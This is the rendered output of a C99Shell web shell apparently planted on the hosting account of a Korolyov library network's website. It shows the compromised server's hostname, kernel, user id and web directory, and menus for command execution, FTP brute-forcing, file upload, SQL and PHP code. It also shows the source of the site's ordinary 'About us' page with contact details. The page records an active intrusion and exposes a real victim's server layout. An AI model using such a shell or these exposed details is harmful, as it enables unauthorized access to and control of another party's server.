!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.68 (Linux) PHP/7.4.33. PHP/7.4.33 

uname -a: Linux bjb2293782.nichost.ru 6.6.151-1.el8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Aug 10
11:16:02 MSK 2026 x86_64
 

uid=12584(bjb2293782) gid=12584(bjb2293782) groups=12584(bjb2293782)  

Safe-mode: OFF (not secure)

/home/bjb2293782/xn--80abaeoqbbrbgf8aea5a2a2z.xn--p1ai/docs/   drwxr-x---
Free 2715.08 GB of 4607.12 GB (58.93%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     aboutus.php (2.63 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
require("design.php");

session_start();


TOP(-1);


LEFTCOLUMN();
CHANNELS();
MAINCOLUMN();
?>

<h1>О нас<?php if (AdminAuth(RIGHT_SUPER_ADMIN))
{
    print 
"<script src='htmleditor.js?1'></script>\n";
    print 
"<img src='edit.png' class=editBtn title='Правка текста `О нас`' onclick='editHTML(\"О нас\",\"aboutus.html\")'>\n";
}
?></h1>

<?php readfile("aboutus.html"); ?>

<hr>
<center>См. также [ <A href='history.php'>История ЦБС</a> ]</center>

<h1>Контакты</h1>
<table>
<tr><td align=right>Телефон:</td><td>+7(495) 511-49-54</td></tr>
<tr><td align=right>E-mail:</td><td><a href='mailto:cbs-korolev@yandeх.ru'>cbs-korolev@yandeх.ru</a></td></tr>
<tr><td align=right>Адрес:</td><td>141078, Московская обл., г. Королёв, ул. 50-летия ВЛКСМ, 5/16</td></tr>
</table>
<br>

<iframe src="https://yandex.ru/map-widget/v1/?um=constructor%3A6671e508e899976f0f985bd2f6ab35b5f73545946abc2b5fb7ab2f35cf57bf03&amp;source=constructor" width="100%" height="400" frameborder="0"></iframe>


<a name=contacts></a>
<h1>Отделы ЦБС<?php

if (AdminAuth(RIGHT_SUPER_ADMIN))
{
    print 
"<script src='maincontactseditor.js'></script>\n";
    print 
"<img src='edit.png' class=editBtn title='Правка отделов ЦБС' onclick='editMainContacts()'>\n";
}


?></h1>

<table cellspacing=0 cellpadding=4 border=1 bordercolor=#cccccc>

<?php
require("maincontacts.php");

foreach(
$mainContacts as $contact)
{
    print 
"<tr>\n";
    print 
"<td>"._html_($contact['director'])."</td>\n";
    print 
"<td align=center>"._html_($contact['person'])."</td>\n";
    print 
"<td nowrap>\n";

    
$first true;
    foreach(
$contact as $key=>$value)
    {
        if (
$key == "phone")
        {
            if (
$first$first false; else print "<br>\n";
            print 
"Тел.: $value";
        }
        else
        if (
$key == "email")
        {
            if (
$first$first false; else print "<br>\n";
            print 
"e-mail: <a href='mailto:$value'>$value</a>";
        }
        else
        if (
$key == "vk")
        {
            if (
$first$first false; else print "<br>\n";
            print 
"<a href='$value' target=_blank>ВКонтакте</a>";
        }
        else
        if (
$key == "telegram")
        {
            if (
$first$first false; else print "<br>\n";
            print 
"<a href='$value' target=_blank>Телеграм</a>";
        }
    }

    print 
"</td>\n";
    print 
"</tr>\n";
}
?>


</table>




<?php

MIDDLECOLUMN2
();
print 
"<center><table><tr><td>";
ACTUALLINKS('actualLinksH');
print 
"</tr></td></table></center>";
FAQ();

MIDDLECOLUMN();
CHANNELS("channelBlockH");
RIGHTCOLUMN();

ACTUALLINKS();
FAQ();

?>




<?php BOTTOM(); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]--